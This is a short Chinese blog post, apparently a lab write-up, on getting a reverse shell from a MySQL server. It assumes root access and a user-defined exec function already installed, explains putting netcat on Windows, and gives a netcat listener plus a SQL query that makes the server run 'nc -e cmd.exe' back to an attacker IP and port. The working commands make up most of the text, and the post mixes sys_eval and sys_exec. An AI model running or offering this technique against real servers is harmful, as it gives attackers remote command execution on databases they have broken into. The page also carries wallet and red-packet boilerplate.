通过MySQL反弹shell

通过MySQL反弹shell

前提条件

  • 目标服务器的MySQL上已经创建sys_eval()函数,具体方法可见Mysql提权
  • 目标服务器上安装了nc
  • 已有目标服务器上MySQL的root用户
如何安装nc?(windows)

① 下载 Netcat for Windows

  • 官方下载:https://eternallybored.org/misc/netcat/
  • 选择 netcat-win32-1.12.zip,解压后得到 nc.exe

② 把 nc.exe 添加到环境变量

  • nc.exe 放到 C:\Windows\System32\(这样可以直接运行 nc)。
  • 或者,把 nc.exe 所在目录添加到 PATH
[Environment]::SetEnvironmentVariable("Path", "$env:Path;C:\path\to\nc", "User")
  • 重新打开 CMD/PowerShell,运行 nc -h 测试是否成功。

实践

首先在攻击机终端打开监听,这里我选择的是4444端口,要选择一个没有被占用的端口

nc -lvnp 4444

这里我通过navicat连接靶机,输入以下代码即可

SELECT sys_exec('nc -e cmd.exe 111.111.111.111 4444');

看到反弹的shell,成功!
请添加图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值